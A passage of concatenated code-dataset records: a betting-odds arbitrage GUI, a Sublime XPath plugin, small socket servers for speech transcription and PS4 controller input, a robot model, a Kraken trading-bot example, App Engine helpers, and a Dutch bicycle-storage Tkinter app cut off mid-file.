pd.DataFrame(new,index=index)\n df.drop(df.columns[2],axis=1,inplace=True)\n df.drop(df.columns[20:],axis=1,inplace=True)\n\n\n df=df.sort_index()\n\n\n\n df.columns=['Team_A','Team_B','All_RA','All_RA_Odds','All_RB','All_RB_Odds','All_DA','ABig','All_DA_Odds','ASmall','All_DB_Odds','Half_RA','Half_RA_Odds','Half_RB','Half_RB_Odds','Half_DA','HBig','Half_DA_Odds','HSmall','Half_DB_Odds']\n df=df.drop(['ASmall','HSmall','Team_A','ABig','HBig','Team_B'],axis=1)\n\n return df\n\ndef cate(name,hole,oddsA,oddsB):\n if hole>=100:\n if float(oddsA)>=0.92 and float(oddsB)>=0.92:\n big.append(str(str(name)+' >100%'))\n end=1\n elif (float(oddsA)+float(oddsB))>=(1.97-0.002*float(hole)) and (float(oddsA)>=0.92) and (float(oddsB)>=0.92):\n if hole>=50:\n fifup.append((str(name)+str(hole)+'%'))\n end=1\n elif hole>=25:\n nor.append((str(name)+str(hole)+'%'))\n end=1\ndef judge_sign(name,a,odd_a,b,odd_b):\n if len(a)==1:a_0 =a[0]\n elif a[1] in ['0','1','2','3','4','5','6','7','8','9']:a_0 = a[0:2]\n else:a_0 =a[0]\n if len(b)==1:b_0 =b[0]\n elif b[1] in ['0','1','2','3','4','5','6','7','8','9']:b_0 = b[0:2]\n else:b_0 =b[0]\n if int(b_0)>int(a_0):\n temp = a\n a = b\n b = temp\n temp = a_0\n a_0 = b_0\n b_0 = temp\n oddtemp = odd_a\n odd_a = odd_b\n odd_b = oddtemp\n if int(b_0)-int(a_0)>1:cate(name,200,odd_a,odd_b)\n if a_0 == b_0:\n if a_0=='0' and 'All' in name :end=1\n if '+' in a :\n a=int(a.split('+')[1])\n if '+' in b:\n b=int(b.split('+')[1])\n cate(name,abs(a-b),odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,abs(a+b),odd_a,odd_b)\n elif '.' 
in b:cate(name,100+a,odd_a,odd_b)\n elif a_0 == b:cate(name,a,odd_a,odd_b)\n else:err_list.append(str(name+'judge_sign'))\n elif '-' in a :\n a=int(a.split('-')[1])\n if '+' in b:\n b=int(b.split('+')[1])\n cate(name,abs(a+b),odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,abs(a-b),odd_a,odd_b)\n elif '.' in b:cate(name,100-a,odd_a,odd_b)\n elif a_0 == b:cate(name,a,odd_a,odd_b)\n else:err_list.append(str(name+'judge_sign'))\n elif '.' in a:\n if '+' in b:\n b=int(b.split('+')[1])\n cate(name,100+b,odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,100-b,odd_a,odd_b)\n elif a==b:end=1\n elif a_0==b:cate(name,100,odd_a,odd_b)\n else:err_list.append(str(name+'judge_sign'))\n elif a_0 == a:\n a=int(a)\n if '+' in b:\n b=int(b.split('+')[1])\n cate(name,b,odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,b,odd_a,odd_b)\n elif '.' in b:cate(name,100,odd_a,odd_b)\n elif a == int(b):end=1\n else:err_list.append(str(name+'judge_sign'))\n end=1\n elif a_0 != b_0:\n if a_0=='1':\n if '+' in a:\n a=int(a.split('+')[1])\n cate(name,100-a,odd_a,odd_b)\n elif '-' in a:\n a=int(a.split('-')[1])\n cate(name,100+a,odd_a,odd_b)\n elif a_0==a:cate(name,100,odd_a,odd_b)\n elif int(a_0)-int(b_0)<2:\n if '+' in a:\n a=int(a.split('+')[1])\n if '+' in b:\n b= int(b.split('+')[1])\n cate(name,100+b,odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,max((100-b),(100-a)),odd_a,odd_b)\n elif '.' in b:cate(name,100-a,odd_a,odd_b)\n elif b_0 == b:cate(name,100,odd_a,odd_b)\n elif '-' in a:\n a=int(a.split('-')[1])\n if '+' in b:\n b= int(b.split('+')[1])\n cate(name,max(100+a,100+b),odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,100+a,odd_a,odd_b)\n elif '.' in b:cate(name,100+a,odd_a,odd_b)\n elif '.' in a:\n if '+' in b:\n b= int(b.split('+')[1])\n cate(name,100+b,odd_a,odd_b)\n elif '-' in b:\n b= int(b.split('-')[1])\n cate(name,100-b,odd_a,odd_b)\n elif '.' in b:cate(name,200,odd_a,odd_b)\n elif b_0 == b:cate(name,200,odd_a,odd_b)\n elif a_0 == a:\n if '+' in b:\n b= int(b.split('+')[1])\n cate(name,100+b,odd_a,odd_b)\n elif '-' in b:\n b= int(b.split('-')[1])\n cate(name,100-b,odd_a,odd_b)\n elif '.' 
in b:cate(name,100,odd_a,odd_b)\n elif b_0 == b:cate(name,100,odd_a,odd_b)\n else:err_list.append(str(name+'judge_sign'))\ndef hoor(name,a,ood_a,b,odd_b):\n if a[0]==b[0]:\n if '+' in a:\n a=int(a.split('+')[1])\n if '+' in b:\n b=int(b.split('+')[1])\n cate(name,max(100-a,100-b),odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,max(100-a,100+b),odd_a,odd_b)\n else:cate('*互*'+name,200,odd_a,odd_b)\n elif '-' in a:\n a=int(a.split('-')[1])\n if '+' in b:\n b=int(b.split('+')[1])\n cate(name,max(100+a,100-b),odd_a,odd_b)\n elif '-' in b:\n b=int(b.split('-')[1])\n cate(name,max(100+a,100+b),odd_a,odd_b)\n else:cate('*互*'+name,200,odd_a,odd_b)\n else:cate('*互*'+name,200,odd_a,odd_b)\n else:cate('*互*'+name,200,odd_a,odd_b)\n end=1\ndef judge(name,list_n,list_b,game_set,side):\n name = name +' @ '+ game_set + '_'\n if side[2:] == 'same':\n if side[0] == '1':\n judge_sign(name,list_n[str(game_set+'A')],list_n[str(game_set+'A_Odds')],list_b[str(game_set+'A')],list_b[str(game_set+'A_Odds')])\n else:\n judge_sign(name,list_n[str(game_set+'B')],list_n[str(game_set+'B_Odds')],list_b[str(game_set+'B')],list_b[str(game_set+'B_Odds')])\n elif side[2:] == 'diff':\n if side[0] == '1':\n judge_sign(name,list_n[str(game_set+'A')],list_n[str(game_set+'B_Odds')],list_b[str(game_set+'B')],list_b[str(game_set+'A_Odds')])\n else:\n judge_sign(name,list_n[str(game_set+'B')],list_n[str(game_set+'A_Odds')],list_b[str(game_set+'A')],list_b[str(game_set+'B_Odds')])\n else:err_list.append(str(name+'judge'))\n end =1\ndef compare(dfn,dfb):\n for i in dfb.index.values:\n global end\n end=0\n while end ==0:\n if i in dfn.index.values:\n for game_range in ['All_','Half_']:\n #讓分\n game_set =game_range+'R'\n # 0 _ 0 _ & else\n if str(dfn.loc[i,game_set+'A']) == '0':\n if pd.isna(dfb.loc[i,game_set+'A']):\n judge(i,dfn.loc[i],dfb.loc[i],game_set,'2_same')\n elif str(dfb.loc[i,game_set+'A']) == '0':continue\n else:judge(i,dfn.loc[i],dfb.loc[i],game_set,'1_same')\n # all & 0 _ 0 _ \n elif str(dfb.loc[i,game_set+'A']) == '0':\n if pd.isna(dfn.loc[i,game_set+'A']):\n judge(i,dfn.loc[i],dfb.loc[i],game_set,'2_same')\n else:judge(i,dfn.loc[i],dfb.loc[i],game_set,'1_same')\n # na _ X _ & \n elif pd.isna(dfn.loc[i,game_set+'A']):\n if pd.isna(dfb.loc[i,game_set+'A']):\n if pd.isna(dfb.loc[i,game_set+'B']):continue\n else:judge(i,dfn.loc[i],dfb.loc[i],game_set,'2_same')\n else:judge(i,dfn.loc[i],dfb.loc[i],game_set,'2_diff')\n # X _ na _ &\n elif pd.isna(dfn.loc[i,game_set+'B']):\n if pd.isna(dfb.loc[i,game_set+'A']):\n if pd.isna(dfb.loc[i,game_set+'B']):continue\n else:judge(i,dfn.loc[i],dfb.loc[i],game_set,'1_diff')\n else:judge(i,dfn.loc[i],dfb.loc[i],game_set,'1_same')\n else:err_list.append(str(i+'compare'))\n # 大小\n game_set = game_range+'D'\n judge(i,dfn.loc[i],dfb.loc[i],game_set,'1_same')\n end=1\ndef get_nine():\n try:\n labelframe1.destroy()\n labelframe2.destroy()\n labelframe3.destroy()\n except:None\n global err_list\n global big\n global fifup\n global nor\n err_list=[]\n big=[]\n fifup=[]\n nor=[]\n line = nineentry.get()\n df_nine = nine(line)\n df_ball = ball() \n nineentry.delete(0,10000)\n compare(df_nine,df_ball)\n data_in()\n \n\ndef data_in():\n global labelframe1\n labelframe1 = tk.LabelFrame(window, text='25% ~ 50%', height = 240, width=130)\n labelframe1.place(x=10,y=160)\n global labelframe2\n labelframe2 = tk.LabelFrame(window, text='50% ~ 100%', height = 240, width=130)\n labelframe2.place(x=140,y=160)\n global labelframe3\n labelframe3 = tk.LabelFrame(window, text=\"over 100%\", height 
= 240, width=130)\n labelframe3.place(x=270,y=160)\n\n for i in range(len(nor)):\n tk.Label(labelframe1, text = nor[i]).place(x=1,y=20*i)\n for i in range(len(fifup)):\n tk.Label(labelframe2, text = fifup[i]).place(x=1,y=20*i)\n for i in range(len(big)):\n bigls = tk.Label(labelframe3, text = big[i])\n bigls.place(x=1,y=20*i)\n for i in range(len(err_list)):\n tk.Label(window, text = err_list[i]).place(x=1,y=500+20*i)\n\n\n\nwindow = tk.Tk()\nwindow.title('打洞用')\nwindow.geometry('407x400')\nninelabel = tk.Label(window,text='九州 : ')\nninelabel.place(x=10,y=10)\nnineentry = tk.Entry(window,show=None)\nnineentry.place(x=50,y=12)\ntk.Button(window, text='開始找洞', width=15,\n height=2, command=get_nine).place(x=250,y=10)\n#tk.Button(window, text='clean', width=15,height=2, command=clean).place(x=250,y=50)\n\n\n\n\nwindow.mainloop()\n","sub_path":"0807/zm0807.py","file_name":"zm0807.py","file_ext":"py","file_size_in_byte":17841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"146430597","text":"import sublime\nimport sublime_plugin\nimport re\n\n\ndef buildPath(view, selection):\n path = ['']\n lines = []\n\n region = sublime.Region(0, selection.end())\n for line in view.lines(region):\n contents = view.substr(line)\n lines.append(contents)\n\n level = -1\n spaces = re.compile('^\\s+')\n for line in lines:\n space = spaces.findall(line)\n current = len(space[0]) if len(space) else 0\n node = re.sub(r'\\s*<\\??([\\w.]:)?([\\w\\-.]+)(\\s.)?>.*', r'\\2', line)\n if current == level:\n path.pop()\n path.append(node)\n elif current > level:\n path.append(node)\n level = current\n elif current < level:\n path.pop()\n level = current\n\n return path\n\n\ndef updateStatus(view):\n path = buildPath(view, view.sel()[0])\n response = '/'.join(path)\n sublime.status_message(response)\n\n\ndef isXML(view):\n ext = re.sub(\n r'.*\\.(\\w+)$',\n r'\\1',\n view.file_name()\n )\n return ext == 'xml'\n\n\nclass XpathCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n view = self.view\n\n if isXML(view):\n response = ''\n selections = view.sel()\n for s, selection in enumerate(selections):\n path = buildPath(view, selection)\n response += '/'.join(path)\n if s != len(selections) - 1:\n response += '\\n'\n sublime.set_clipboard(response)\n\n\nclass XpathListener(sublime_plugin.EventListener):\n def on_text_command(self, view, command, args):\n if(isXML(view) and command == \"move\"):\n updateStatus(view)\n","sub_path":"xpath.py","file_name":"xpath.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"369222666","text":"#import of the necessary modules and the API functions\nimport socket \nfrom speechText import speechtext as st\nfrom NLP import npl\n\n#declaration of the port and adress for the communication\nPORT = 8080\nSERVER = \"127.0.0.1\"\nADDR = (SERVER, PORT)\n\n#initiate the TCP-Socket connection\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(ADDR)\n\n#declaration of the start function which is listening for an connection and write received in working file\ndef start():\n\n print(\"[STARTING] Server is starting...\") \n server.listen() \n print(f\"[LISTENING] Server is listening on {ADDR}\") \n conn, addr = server.accept()\n with open('received.ogg','wb') as f:\n print(f\"Server is receiving data from {addr}\")\n while True:\n l = bytearray(conn.recv(1024))\n f.write(bytes(l))\n if not l: break\n\n#call of the start 
function\nstart()\n\nprint(\"Verarbeitung läuft...\")\n\n#call of the transcription function of the speechText-API\ntranscription = st() \nsplitedText = transcription.split(\"\\n\") #split transcriped text into array\nmyText = str(splitedText[2]) #read text part of array and save as string\nprint(myText) \n\nprint(\"Text wird Analysiert\") \n\n#call analysing function of naturalLanguageUnderstanding-API and save result\nresults = npl(myText)\n\n#start of an new TCP connection to send the results \nprint(\"[Reconnect] Server is opening ne connection...\") \nserver.listen() \nprint(f\"[LISTENING] Server is listening on {ADDR}\") \nconn, addr = server.accept()\nprint(addr)\n\n#declaration of sendAnswer function that sends answer to client and ends the connection\ndef sendAnswer(myText):\n \n print('Sending answer')\n msg = bytearray(myText, 'utf-8')\n print(msg)\n conn.sendall(msg)\n print('Send completed')\n conn.close()\n\nsendAnswer(myText)\n","sub_path":"TCP-Server.py","file_name":"TCP-Server.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120543059","text":"'''\nCreated on 03.12.2013\n\n@author: Arne\n'''\nfrom Element import Element\nfrom Parameter import Parameter\n\n\nclass SimpleChipGrid(Element):\n '''\n classdocs\n '''\n\n def __init__(self,cell):\n '''\n Constructor\n \n draw two resonator cose to each other\n '''\n Element.__init__(self,cell)\n \n self.chipDistance = Parameter('chipDistance','distance to keep between the different chips')\n self.rowNumber = Parameter('rowNumber','number of rows')\n self.chipDistance.value = 100\n \n self.parameters.append(self.chipDistance)\n \n # create List of possible chips\n \n \n ","sub_path":"Designs/src_gdspy041/des_131101_CMPII/ChipGrid.py","file_name":"ChipGrid.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"582535436","text":"# Copyright (C) 2011 Computation Institute\n#\n__author__ = 'vas@ci.uchicago.edu (Vas Vasiliadis)'\n\nimport os\nimport logging as log\n\nfrom google.appengine.ext import db\nfrom google.appengine.api import mail\nfrom google.appengine.api import users\n\nimport models\nimport appglobals as globals\n\n#\n# Sets application settings\n#\nport = os.environ.get('SERVER_PORT')\nif port and port != '80':\n _HOST_NAME = '%s:%s' % (os.environ.get('SERVER_NAME'), port)\nelse:\n _HOST_NAME = os.environ.get('SERVER_NAME')\n \n_APP_VERSION = os.environ['CURRENT_VERSION_ID']\n\n#\n# Sets login/logout URL based on user's authentication status\n#\n# Returns: dictionary that is passed to page templates\n# 'user' is the currently logged-in user object\n# 'loginout_url' is the URL to redirect to for login/logout\n# 'debug\" is passed so that templates can be modified dynamically\n# 'isadmin\" denotes whether the user is logged in as an application administrator\n#\ndef SetLoginValues(user=None, url=\"/\"):\n user = users.get_current_user()\n admin = users.is_current_user_admin()\n if not user:\n loginout = users.create_login_url(url)\n else:\n loginout = users.create_logout_url(\"/\")\n return {'user':users.get_current_user(), 'loginout_url':loginout, 'debug':globals._APP_DEBUG, 'isadmin':admin, 'app_version':_APP_VERSION}\n\n#\n# Gets the specified user's profile; f no user is specified, \n# gets the profile of the currently logged in user\n#\ndef GetUserProfile(user=None):\n if not user:\n user = users.get_current_user()\n \n return 
db.Query(models.UserProfile).filter('google_user_id = ', user.user_id()).fetch(1)[0]\n\ndef GetGoogleID(user=None):\n if not user:\n user = users.get_current_user()\n\n return user.user_id()\n\ndef SendEmail(recipient, subject=\"Globus Online Usage Tracking\", body='', copied=None, blindcopied=None, sender=None):\n message = mail.EmailMessage()\n # TODO: Validate e-mail addresses to protect against hack\n if sender is None:\n message.sender = \"GO Usage Tracker <%s>\" % globals._ADMIN_NOTIFY_EMAIL\n else:\n message.sender = sender\n \n if mail.is_email_valid(recipient):\n message.to = recipient\n message.subject = subject\n message.body = body\n if copied is not None:\n message.cc = copied\n if blindcopied is not None:\n message.bcc = blindcopied\n \n try:\n message.send()\n log.info('Mail: Sent to ' + recipient)\n return\n except:\n pass\n \n log.info('Mail: Send to ' + recipient + ' failed')\n return\n\ndef printDict(aDict, br='
    ', keyAlign='left', keyPrefix='', keySuffix='', valuePrefix='', valueSuffix='', leftMargin=0, indent=0 ):\n output = []\n\n # Stringify keys and values\n keys = [str(x) for x in aDict.keys()]\n values = [str(x) for x in aDict.values()] \n\n # Set keys length to length of longest key string\n maxKeyLen = max([len(str(x)) for x in keys])\n\n for i in range(len(keys)):\n # Adjust key width\n k = {keyAlign=='left' : str(keys[i]).ljust(maxKeyLen),\n keyAlign=='right': str(keys[i]).rjust(maxKeyLen)}[1] \n v = values[i]\n output.append(' '*indent + '%s%s%s: %s%s%s%s' %(keyPrefix, k, keySuffix, valuePrefix, v, valueSuffix, br))\n\n if leftMargin:\n output = [' '*leftMargin + x for x in output]\n \n return '%s' % ''.join(output)\n\ndef printList(aList, br='
    ', prefix='', suffix='', leftMargin=0, indent=0):\n output = [] \n for item in aList:\n if leftMargin:\n item = ' '*leftMargin + item\n output.append(' '*indent + '%s%s%s%s' %(prefix, item, suffix, br))\n return '%s' % ''.join(output)","sub_path":"apputils.py","file_name":"apputils.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574670615","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 7 10:18:45 2019\r\n\r\n@author: DEAGOSTINOJ\r\n\"\"\"\r\n\r\nfpOut = open('C:\\Temp\\DeviceList_2.txt','a') \r\n#fpOut.write('Test\\n') \r\n \r\n \r\nfilepath = 'C:\\Temp\\DeviceList.txt' \r\nwith open(filepath) as fp: \r\n line = fp.readline()\r\n cnt = 1\r\n while line:\r\n# print(\"Line {}: {}\".format(cnt, line.strip()))\r\n print(\"{}'{},'\".format(cnt, line.strip())) \r\n fpOut.write(\"'{}',\".format(line.strip()))\r\n line = fp.readline()\r\n cnt += 1\r\n \r\n \r\nfpOut.close() ","sub_path":"FileMan.py","file_name":"FileMan.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159613390","text":"import os\nimport pprint\nimport pygame\nimport json \nimport pprint\nimport socket\nimport sys\n\nclass PS4Controller(object):\n \"\"\"Class representing the PS4 controller. Pretty straightforward functionality.\"\"\"\n\n controller = None\n axis_data = {0: 0.0, 1: 0.0, 2: 0.0, 3: 0.0, 4: 0.0}\n button_data = None\n hat_data = None\n\n def init(self):\n \"\"\"Initialize the joystick components\"\"\"\n \n pygame.init()\n pygame.joystick.init()\n self.controller = pygame.joystick.Joystick(0)\n self.controller.init()\n\n def listen(self, ip, port):\n \"\"\"Listen for events to happen\"\"\"\n\n s = socket.socket() \n print (\"Socket successfully created\")\n\n s.bind((ip, port)) \n print (\"socket binded to %s\" %(port)) \n s.listen(5) \n print (\"socket is listening\") \n \n c, addr = s.accept() \n print ('Got connection from', addr) \n\n if not self.axis_data:\n self.axis_data = {}\n\n if not self.button_data:\n self.button_data = {}\n for i in range(self.controller.get_numbuttons()):\n self.button_data[i] = False\n\n if not self.hat_data:\n self.hat_data = {}\n for i in range(self.controller.get_numhats()):\n self.hat_data[i] = (0, 0)\n\n try: \n while True:\n for event in pygame.event.get():\n if event.type == pygame.JOYAXISMOTION:\n self.axis_data[event.axis] = round(event.value,3)\n elif event.type == pygame.JOYBUTTONDOWN:\n self.button_data[event.button] = True\n elif event.type == pygame.JOYBUTTONUP:\n self.button_data[event.button] = False\n elif event.type == pygame.JOYHATMOTION:\n self.hat_data[event.hat] = event.value\n\n # Insert your code on what you would like to happen for each event here!\n # In the current setup, I have the state simply printing out to the screen.\n \n os.system('clear')\n pprint.pprint(self.button_data)\n pprint.pprint(self.axis_data, width=1)\n print(type(self.hat_data))\n pprint.pprint(self.hat_data)\n\n data_byte = json.dumps(self.axis_data).encode('utf-8')\n c.sendall(data_byte)\n data = c.recv(4).strip()\n print(data)\n # return self.axis_data , self.hat_data, self.button_data\n except Exception as e:\n print(e)\n print('Closing Connection')\n c.close() \n\nif __name__ == \"__main__\":\n ps4 = PS4Controller()\n ps4.init()\n ps4.listen(sys.argv[1], 
int(sys.argv[2]))\n","sub_path":"client_server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"517517451","text":"\"\"\"\n@author: Luis Fernando Lara Tobar\n@author: Peter Corke\n@author: Samuel Drew\n\"\"\"\n\nfrom roboticstoolbox import DHRobot, RevoluteDH\nimport numpy as np\n\n\nclass Planar3(DHRobot):\n \"\"\"\n Create a planar 3 link robot\n \"\"\"\n\n def __init__(self):\n\n L = [RevoluteDH(a=1),\n RevoluteDH(a=1),\n RevoluteDH(a=1)]\n\n super().__init__(L, name='Planar 3 link', keywords=('planar',))\n self.addconfiguration(\"qz\", [0, 0, 0])\n\nif __name__ == '__main__':\n\n robot = Planar3()\n print(robot)","sub_path":"roboticstoolbox/models/DH/Planar3.py","file_name":"Planar3.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267232353","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\nKraken 模块使用演示\n\n为了在订单薄买盘提前埋伏订单,在 `XBT/USD` 订单薄盘口距离10美金的位置挂买单,数量量为1。\n随着订单薄盘口价格不断变化,需要将价格已经偏离的订单取消,再重新挂单,使订单始终保持距离盘口价差为 `10 ± 1` 美金。\n这里设置了缓冲价差为 `1` 美金,即只要盘口价格变化在 `± 1` 内,都不必撤单之后重新挂单,这样设置的目的是尽量减少挂撤单的次数,\n因为交易所开放的交易接口有调用频率的限制,如果调用太过频繁超过了限制可能会报错。\n\"\"\"\n\nimport sys\n\nfrom quant import const\nfrom quant.utils import tools\nfrom quant.utils import logger\nfrom quant.config import config\nfrom quant.market import Market\nfrom quant.trade import Trade\nfrom quant.order import Order\nfrom quant.market import Orderbook\nfrom quant.order import ORDER_ACTION_BUY, ORDER_STATUS_FAILED, ORDER_STATUS_CANCELED, ORDER_STATUS_FILLED\n\n\nclass MyStrategy:\n\n def __init__(self):\n \"\"\" 初始化\n \"\"\"\n self.strategy = config.strategy\n self.platform = const.KRAKEN\n self.account = config.accounts[0][\"account\"]\n self.access_key = config.accounts[0][\"access_key\"]\n self.secret_key = config.accounts[0][\"secret_key\"]\n self.symbol = config.symbol\n\n self.order_no = None # 创建订单的id\n self.create_order_price = \"0.0\" # 创建订单的价格\n\n # 交易模块\n cc = {\n \"strategy\": self.strategy,\n \"platform\": self.platform,\n \"symbol\": self.symbol,\n \"account\": self.account,\n \"access_key\": self.access_key,\n \"secret_key\": self.secret_key,\n \"order_update_callback\": self.on_event_order_update\n }\n self.trader = Trade(**cc)\n\n # 订阅行情\n Market(const.MARKET_TYPE_ORDERBOOK, self.platform, self.symbol, self.on_event_orderbook_update)\n\n async def on_event_orderbook_update(self, orderbook: Orderbook):\n \"\"\" 订单薄更新\n \"\"\"\n logger.debug(\"orderbook:\", orderbook, caller=self)\n ask1_price = float(orderbook.asks[0][0]) # 卖一价格\n bid1_price = float(orderbook.bids[0][0]) # 买一价格\n price = (ask1_price + bid1_price) / 2 # 为了方便,这里假设盘口价格为 卖一 和 买一 的平均值\n\n # 判断是否需要撤单\n if self.order_no:\n if (self.create_order_price + 10 > price - 1) and (self.create_order_price + 10 < price + 1):\n return\n _, error = await self.trader.revoke_order(self.order_no)\n if error:\n logger.error(\"revoke order error! error:\", error, caller=self)\n return\n self.order_no = None\n logger.info(\"revoke order:\", self.order_no, caller=self)\n\n # 创建新订单\n new_price = price + 10\n quantity = \"1\" # 委托数量为1\n action = ORDER_ACTION_BUY\n new_price = tools.float_to_str(new_price) # 将价格转换为字符串,保持精度\n quantity = tools.float_to_str(quantity) # 将数量转换为字符串,保持精度\n order_no, error = await self.trader.create_order(action, new_price, quantity)\n if error:\n logger.error(\"create order error! 
error:\", error, caller=self)\n return\n self.order_no = order_no\n self.create_order_price = float(new_price)\n logger.info(\"create new order:\", order_no, caller=self)\n\n async def on_event_order_update(self, order: Order):\n \"\"\" 订单状态更新\n \"\"\"\n logger.info(\"order update:\", order, caller=self)\n\n # 如果订单失败、订单取消、订单完成交易\n if order.status in [ORDER_STATUS_FAILED, ORDER_STATUS_CANCELED, ORDER_STATUS_FILLED]:\n self.order_no = None\n\n\ndef main():\n if len(sys.argv) > 1:\n config_file = sys.argv[1]\n else:\n config_file = None\n\n from quant.quant import quant\n quant.initialize(config_file)\n MyStrategy()\n quant.start()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"example/kraken/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513215375","text":"from tkinter import *\r\nimport json\r\nimport random\r\nimport datetime\r\nfrom tkinter.messagebox import showinfo\r\nimport sys\r\n\r\nchipkaartnummer = \"\"\r\nname = \"\"\r\ncounter = 0\r\ncounter1 = 0\r\ncounter2 = 0\r\nID = \"\"\r\ndef backToMenu():\r\n root.deiconify()\r\n#\r\n# def closeTab():\r\n# window.withdraw()\r\n\r\ndef loadJSON():\r\n global database\r\n file = (open('database.txt', 'r')).read()\r\n database = json.loads(file)\r\n\r\ndef writeJSON():\r\n global database\r\n text = json.dumps(database, sort_keys=True, indent=4)\r\n with open('database.txt', 'w') as file:\r\n file.write(text)\r\n\r\ndef randomID():\r\n global database\r\n number = ''\r\n for loop in range(10):\r\n number += str(random.randrange(0,9))\r\n if number in database:\r\n return randomID()\r\n else:\r\n return number\r\n#\r\n# def return_entry():\r\n# \"\"\"Gets and prints the content of the entry\"\"\"\r\n# content = entry.get()\r\n# print(content)\r\n\r\nentryb1 = StringVar\r\n\r\ndef register():\r\n global database\r\n loadJSON()\r\n # window = Toplevel(root)\r\n\r\n def closeTab():\r\n window.withdraw()\r\n\r\n def nameAsk():\r\n window = Toplevel(root)\r\n Label(window, text=\"Wat is uw volledige naam? \").pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n entry1 = Entry(window, textvariable=entryb1)\r\n entry1.pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n # Connect the entry with the return button\r\n # entry.bind('', entry.get())\r\n\r\n def callback():\r\n print(entry1.get())\r\n global name\r\n name = entry1.get()\r\n fietsCode()\r\n\r\n b1 = Button(window, text=\"continue\", command= lambda: callback())\r\n b1.pack()\r\n closeTab()\r\n\r\n def fietsCode():\r\n ovChip = chipkaartnummer\r\n database[ID] = {'naam' : name, 'aanwezig' : False, 'ovchip' : ovChip}\r\n showinfo(message='Het unieke nummer van jouw fiets is: ' + str(ID))\r\n window = Toplevel(root)\r\n\r\n def meteenStallen():\r\n database[ID]['aanwezig'] = True\r\n database[ID]['sinds'] = str(datetime.datetime.now())\r\n def back():\r\n backToMenu()\r\n back()\r\n\r\n\r\n Label(window, text=\"Wilt u uw fiets meteen stallen? 
\").pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n b1 = Button(window, text=\"Ja\", command= lambda: meteenStallen())\r\n b1.pack(side=LEFT)\r\n\r\n b2 = Button(window, text=\"Nee\", command= lambda: backToMenu())\r\n b2.pack(side=RIGHT)\r\n writeJSON()\r\n\r\n\r\n if counter > 0:\r\n nameAsk()\r\n\r\n global counter\r\n counter += 1\r\n if counter1 <= 0:\r\n chipscan()\r\n ID = randomID()\r\n\r\ndef store():\r\n global database\r\n loadJSON()\r\n global counter\r\n\r\n window = Toplevel(root)\r\n Label(window, text=\"Geef het 10 cijferig nummer van jouw de fiets: \").pack()\r\n entry1 = Entry(window, textvariable=entryb1)\r\n entry1.pack()\r\n\r\n def callback():\r\n print(entry1.get())\r\n global ID\r\n ID = entry1.get()\r\n\r\n b1 = Button(window, text=\"continue\", command=callback())\r\n b1.pack()\r\n ID = input('Geef het 10 cijferig nummer van jouw de fiets: ')\r\n if ID not in database:\r\n showinfo(message='Deze fiets is niet bij ons bekend')\r\n elif database[ID]['aanwezig'] is True:\r\n showinfo(message='Deze fiets staat al in de stalling...')\r\n else:\r\n database[ID]['aanwezig'] = True\r\n database[ID]['sinds'] = str(datetime.datetime.now())\r\n writeJSON()\r\n\r\ndef pickup():\r\n global database\r\n loadJSON()\r\n ID = input('Geef het 10 cijferig nummer van de fiets die je wilt ophalen: ')\r\n if ID not in database:\r\n showinfo(message='Deze fiets is niet bij ons bekend')\r\n elif database[ID]['aanwezig'] is False:\r\n showinfo(message='Deze fiets staat niet in de stalling')\r\n else:\r\n ovChip = chipscan()\r\n if database[ID]['ovchip'] != ovChip:\r\n showinfo(message='Jij bent niet de eigenaar van deze fiets')\r\n else:\r\n database[ID]['aanwezig'] = False\r\n del database[ID]['sinds']\r\n showinfo(message='Je hebt je fiets opgehaald')\r\n writeJSON()\r\n\r\ndef count():\r\n global database\r\n loadJSON()\r\n count = 0\r\n for fiets in database:\r\n if database[fiets]['aanwezig'] is True:\r\n count += 1\r\n if count == 1:\r\n showinfo(message='Er staat op dit moment 1 fiets in de stalling')\r\n else:\r\n showinfo(message='Er staan op dit moment ' + str(count) + ' fietsen in de stalling')\r\n showinfo(message='Er zijn nog ' + str(500 - count) + ' plekken beschikbaar')\r\n\r\ndef chipscan():\r\n\r\n root.withdraw()\r\n #haalt root weg, terug krijgen is root.deiconify()\r\n global counter1\r\n counter1 += 1\r\n # counter1 is zodat ie niet nog een keer door bepaalde code loopt\r\n window = Toplevel(root)\r\n Label(window, text=\"Dit leest de ov-chipkaart scanner? 
